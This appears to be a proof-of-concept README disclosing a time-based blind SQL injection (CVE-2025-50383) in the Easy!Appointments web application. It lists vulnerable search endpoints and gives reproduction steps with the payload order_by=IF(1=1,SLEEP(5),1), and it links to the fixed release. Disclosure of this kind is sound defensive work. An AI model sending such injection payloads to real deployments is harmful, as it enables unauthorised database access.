# CVE-2025-50383
# Description
A low-privileged authenticated user can exploit this vulnerability by sending a crafted HTTP POST request with a malicious order_by parameter (e.g., order_by=IF(1=1,SLEEP(5),1)). This can trigger time-based blind SQL injection, resulting in unauthorized SQL execution on the underlying MySQL database and leading to full SQL injection exploitation.
# Affected Endpoints
Exploitable by low-privileged authenticated users (roles: Customers and Providers):
1. /index.php/customers/search
2. /index.php/Unavailabilities/search
3. /index.php/Appointments/search
Exploitable only by Administrator:
1. /index.php/providers/search
2. /index.php/secretaries/search
3. /index.php/admins/search
4. /index.php/service_categories/search
5. /index.php/services/search
6. /index.php/Blocked_periods/search
6. /index.php/Webhooks/search
# Steps to Reproduce
1. Intercept a valid authenticated request to one of the vulnerable endpoints.
2. Add the hidden order_by parameter in the request body.
3. Inject a malicious payload, for example: order_by=IF(1=1,SLEEP(5),1)
4. Send the modified request.
5. The application response is delayed, confirming time-based blind SQL injection.
# Fixed
https://github.com/alextselegidis/easyappointments/releases/tag/1.5.2-beta.1
[4.0K] /data/pocs/c26bf4d6aacc9d0a2306e4b6211e4ea752e3d03d
└── [1.3K] README.md
0 directories, 1 file